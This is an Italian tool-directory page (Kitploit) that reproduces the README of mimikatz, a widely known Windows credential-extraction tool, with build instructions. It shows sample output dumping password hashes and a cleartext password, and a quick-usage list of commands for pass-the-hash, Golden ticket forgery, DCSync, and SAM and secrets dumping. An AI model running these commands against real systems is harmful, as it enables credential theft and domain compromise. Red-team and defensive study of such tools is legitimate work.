Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/gentilkiwi/mimikatz
Password CrackingFrameworks per Penetration TestingFramework di ExploitAttacchi alle PasswordMeccanismi di PersistenzaExploitAnalisi HashMovimento LateralePost-ExploitPenetration TestingAutenticazione
21.8k4.2k835 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Red Teaming
Sviluppo Payload
Top in Exploit n.12
Top in Framework di Exploit n.15
Top in Analisi Hash n.20
Top in Movimento Laterale n.20
Top in Attacchi alle Password n.9
Top in Password Cracking n.9
Top in Frameworks per Penetration Testing n.15
Top in Meccanismi di Persistenza n.11
Top in Post-Exploit n.3
Top in Red Teaming n.10
GitHubgentilkiwi/mimikatz

mimikatz

Un piccolo strumento per giocare con la sicurezza di Windows

Vedi RepositorySito web

mimikatz

mimikatz è uno strumento che ho creato per imparare il C e fare alcuni esperimenti con la sicurezza di Windows.

È ora ben noto per estrarre password in chiaro, hash, codici PIN e ticket Kerberos dalla memoria. mimikatz può anche eseguire pass-the-hash, pass-the-ticket o creare Golden tickets.

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Ma non è tutto! Crypto, Terminal Server, Events, ... molte informazioni nel Wiki di GitHub https://github.com/gentilkiwi/mimikatz/wiki o su https://blog.gentilkiwi.com (in francese, sì).

Se non vuoi compilarlo, i binari sono disponibili su https://github.com/gentilkiwi/mimikatz/releases

Quick usage

log
privilege::debug

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz si presenta sotto forma di una soluzione di Visual Studio e un driver WinDDK (opzionale per le operazioni principali), quindi i prerequisiti sono:

  • per mimikatz e mimilib : Visual Studio 2010, 2012 o 2013 per Desktop (2013 Express for Desktop è gratuito e supporta x86 e x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • per mimikatz driver, mimilove (e piattaforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz usa SVN per il controllo versione, ma ora è disponibile anche con GIT! Puoi usare qualsiasi strumento per sincronizzare, anche il GIT integrato in Visual Studio 2013 =)

Synchronize!

  • GIT URL è : https://github.com/gentilkiwi/mimikatz.git
  • SVN URL è : https://github.com/gentilkiwi/mimikatz/trunk
  • ZIP file è : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Build the solution

  • Dopo aver aperto la soluzione, Build / Build Solution (puoi cambiare architettura)
  • mimikatz è ora compilato e pronto per essere utilizzato! (Win32 / x64 e anche ARM64 se sei fortunato)
  • potresti ricevere l'errore MSB3073 relativo a _build_.cmd e mimidrv, perché il driver non può essere compilato senza Windows Driver Kit 7.1 (WinDDK), ma mimikatz e mimilib sono OK.

ddk2003

Con questa piattaforma MSBuild opzionale, puoi usare gli strumenti di compilazione WinDDK e il runtime predefinito msvcrt (binari più piccoli, nessuna dipendenza)

Per questa piattaforma opzionale, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 e Visual Studio 2010 sono obbligatori, anche se prevedi di utilizzare in seguito Visual Studio 2012 o 2013.

Segui le istruzioni:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Continuous Integration

Il progetto mimikatz è disponibile su AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Il suo stato è: Stato CI di AppVeyor

Licence

Licenza CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz ha bisogno di caffè per essere sviluppato:

  • PayPal: https://www.paypal.me/delpy/

Author

  • Benjamin DELPY gentilkiwi, puoi contattarmi su Twitter ( @gentilkiwi ) o via email ( benjamin [at] gentilkiwi.com )
  • Le funzioni DCSync e DCShadow nel modulo lsadump sono state co-scritte con Vincent LE TOUX, puoi contattarlo via email ( vincent.letoux [at] gmail.com ) o visitare il suo sito web ( http://www.mysmartlogon.com )

Questo è uno sviluppo personale, per favore rispetta la sua filosofia e non usarlo per cose cattive!

Scarica lo strumento